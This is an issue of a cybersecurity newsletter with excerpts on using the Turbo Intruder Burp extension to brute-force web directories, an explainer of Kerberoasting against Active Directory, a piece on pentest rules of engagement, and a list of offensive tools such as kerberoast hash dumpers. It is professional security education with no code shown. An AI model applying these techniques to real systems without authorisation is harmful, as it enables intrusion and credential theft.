SecPro #49: Turbo Intruding, Roasting Kerberos, and Setting the Rules of Engagement.
This week’s a bumper issue that not only brings you all the premium articles that you have been waiting for, but also a giveaway which will allow our lucky winners to a free three-month subscription to the Packt Plus, on us. How do you win? Well, you’re going to need to share this newsletter around to gain raffle tickets. We’ll draw a ticket from a virtual hat next week and send out emails to the winners. Sound good? Good.
Of course, don’t forget to claim your free eBook by clicking on the survey below. This offer is available for everyone currently subscribed to the SecPro Weekly Insider, including those of you still enjoying the trial period. Fill it in, tell us what you think, and we’ll send you an eBook as a thank you.
Turbo Intruder – hacking at light speed
By Indrajeet Bhuyan
Last week I wrote an article called “ 5 must-have burp suite extensions “. One of the extensions that I mentioned was Turbo Intruder. Today we will have a dedicated article only for turbo intruder. You might ask me why? The answer is that this tool is so awesome that it does deserve a dedicated article.
We all love burp suite but the only thing that we hate about burp suite is the throttle. In the community version, the intruder speed is reduced. You might say to me hey I already have burp professional and I can use an intruder at full speed do I still need a turbo intruder? My answer is yes. This is because turbo intruder makes scan so fast that even intruder in full speed cannot compete with it.
How often do you find yourself running scans that take forever to complete? Often we end up cancelling the scan as it takes a lot of time. Let me introduce you to Turbo Intruder. Turbo Intruder is a research-grade open source Burp Suite extension built with speed in mind. It can send a large number of HTTP requests and analyze the result. Also, it uses way too less memory and the best part is that it’s completely free.
Here are some of the features of Turbo Intruder :
- Fast – Turbo Intruder uses an HTTP stack hand-coded from scratch with speed in mind. As a result, on many targets, it can seriously outpace even fashionable asynchronous Go scripts.
- Scalable – Turbo Intruder can achieve flat memory usage, enabling reliable multi-day attacks. It can also be run in headless environments via the command line.
- Flexible – Attacks are configured using Python. This enables the handling of complex requirements such as signed requests and multi-step attack sequences. Also, the custom HTTP stack means it can handle malformed requests that break other libraries.
- Convenient – Boring results can be automatically filtered out by an advanced diffing algorithm adapted from Backslash Powered Scanner. This means you can launch an attack and obtain useful results in two clicks.
Installing Turbo Intruder
Open burp suite and click on the extender and then click on BApp store.
Now click on Turbo Intruder:
Click on install:
How to use turbo intruder
First, intercept the request and send it to the Turbo Intruder:
Select the template. Here you can find different templates which can help you do almost anything. For this example, I’m using the basic.py to brute force the web directory.
Here is the code for basic.py
Now I’ll add the wordlist and configure the following and click on attack
With this configuration, we get the following RPS:
Now lets change the configuration:
Here I have changed the value of concurrent connection to 22.
Now the RPS changes to around 25 which is much faster than the previous RPS:
Want to read the rest of Indrajeet’s walkthrough? Click the link below and access the entire breakdown of how to get the best out of Turbo Intruder. 👇
Kerberoasting – Hacking Active Directory Password Hashes
By Andy Pantelli
Kerberoasting attacks, as defined by Mitre Att&ck TTP ID T1558.003 can be exploited by Malicious Actors with financial gain motivations including groups like FIN7 who are known to use Kerberoasting to carry out ransomware attacks. This article aims to dig a little deeper and explain just what the attack is, and how it works.
Kerberos is a legitimate service used for granting tickets to apply permissions to a Service Principle Name account (SPN). Each SPN is used to uniquely identify a distinct Windows Service instance. To provide a means of authentication, Kerberos requires that an account tasked with running a service, known as a service account, is associated with an SPN. The attack can target as many service accounts or even carry out internal reconnaissance seeking out specific service accounts that have privileges that the attacker is looking for. In either instance, the attacker is looking to enumerate the SPN for the service accounts being targeted.
Risks vary per attack technique, and each individuals Adversaries motive. When a Kerberos ticket request is made via the Domain Controller Key Distribution Cent (KDC) elements of the ticket which is returned are encrypted with the RC4 algorithm and susceptible of offline brute-force attack which then expose the plaintext credentials. Cracked hashes may be used to gain Privilege Escalation, Persistence or Lateral Movement by accessing valid accounts.
Breaking this down,
- Attacker gains access to a Windows Network.
- The Kerberoasting technique is used to brute-force the Kerberos ticket to acquire service account password.
- Attacker can then move laterally, escalate privileges or pivot in the Network.
Want to read the rest of Andy’s article? Click the link below to access the whole tutorial! 👇
The Rules of Engagement: Pentesting and helping your clients understand
Pentesting is a necessary service that a growing number of businesses are starting to make use of, but that tendency isn’t universal. For some business leaders, it seems like an unnecessary cost. For others, they simply don’t understand what pentesting is and why it is useful. If you’re an aspiring penetration expert, it is a difficult problem to overcome. How can you possibly provide potential clients with exactly what they’ll receive?
Well, that’s easy – with a Rules of Engagement document. Much like the battles of old, establishing rules for any conflict is necessary to determine what is honourable, err, I mean included in the service. For anyone who is breaking out to start their own pentesting business, just like any freelancer, you need to say what you are willing to offer, what the client is expecting to receive, and what they can’t include for free at the last minute!
Want to know how to build pentesting rules of engagement agreements? Click the link below to find out the necessary information. 👇
The SecPro Giveaway
Want to win one of 10 free 3-month Packt+ unlimited subscriptions? We’re giving away these fantastic prizes to our readers and there’s only one thing you have to do – share this newsletter with your friends and in your cybersecurity circles!
Click below to get started!
This Week’s Tutorials & Explainers
This week, we looked at the penultimate entry in our MITRE ATT&CK framework breakdown – T1055: Process Injection. Click the link to read the article!
No news is good news, but we’ve rounded up the big events of the last week to send to you anyway. Check out the future of FIDO and other stories by clicking the link.
Secret Knowledge: Building Your Security Arsenal
Here’s another edition of Secret Knowledge, with plenty of tools to help you test and secure your infrastructure systems. All tools are chosen by our crack team of researchers on the most important metric of all – sounding a bit interesting.
- skelsec/kerberoast: Kerberoast attack -pure python-
- ShutdownRepo/targetedKerberoast: targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print “kerberoast” hashes for user accounts that have a SPN set.
- Retrospected/kerbmon: KerbMon pulls the current state of the Service Principal Name (SPN) records and sAMAccounts that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). It stores these results in a SQLite3 database.
- almandin/fuxploider: Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws.
- ucsb-seclab/dr_checker: DR. CHECKER : A Soundy Vulnerability Detection Tool for Linux Kernel Drivers. This repo contains all the sources, including setup scripts. Now with an Amazing UI to view the warnings along with corresponding source files.
- splunk/attack_range: A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk